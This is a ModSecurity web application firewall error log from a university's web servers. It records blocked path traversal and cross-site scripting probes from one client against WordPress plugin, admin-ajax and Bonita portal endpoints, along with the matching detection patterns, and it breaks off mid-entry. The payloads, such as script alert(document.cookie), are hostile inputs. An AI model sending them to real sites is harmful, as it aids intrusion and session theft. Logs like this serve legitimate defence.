[Tue Aug 29 11:57:02.764272 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nsCo-f0AAArbWR4AAAAG"]
[Tue Aug 29 11:57:02.804135 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nsCo-f0AAAq5@b4AAAAK"]
[Tue Aug 29 11:57:03.563482 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16n8Co-f0AAAoz8XIAAAAS"]
[Tue Aug 29 11:57:04.108564 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16oMCo-f0AAAq5@cMAAAAK"]
[Tue Aug 29 11:57:05.533166 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAArbWToAAAAG"]
[Tue Aug 29 11:57:05.577540 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAqqtpcAAAAA"]
[Tue Aug 29 11:57:05.585078 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAArbWTsAAAAG"]
[Tue Aug 29 11:57:05.639217 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAnEqWcAAAAO"]
[Tue Aug 29 11:57:05.687087 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAm80T0AAAAF"]
[Tue Aug 29 11:57:06.655022 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16osCo-f0AAAnEqXEAAAAO"]
[Tue Aug 29 11:57:07.558223 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AIAAAAV"]
[Tue Aug 29 11:57:07.608165 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AQAAAAV"]
[Tue Aug 29 11:57:07.623844 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAqqtqQAAAAA"]
[Tue Aug 29 11:57:07.632880 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAoz8YwAAAAS"]
[Tue Aug 29 11:57:07.657733 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArbWUgAAAAG"]
[Tue Aug 29 11:57:07.674396 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAqqtqYAAAAA"]
[Tue Aug 29 11:57:07.675404 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AcAAAAV"]
[Tue Aug 29 11:57:07.677174 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAoz8Y4AAAAS"]
[Tue Aug 29 11:57:07.760897 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AgAAAAV"]
[Tue Aug 29 11:57:07.762784 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAoz8Y8AAAAS"]
[Tue Aug 29 11:57:08.561809 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq-HpsAAAAT"]
[Tue Aug 29 11:57:08.608195 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq-HpwAAAAT"]
[Tue Aug 29 11:57:08.649064 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag 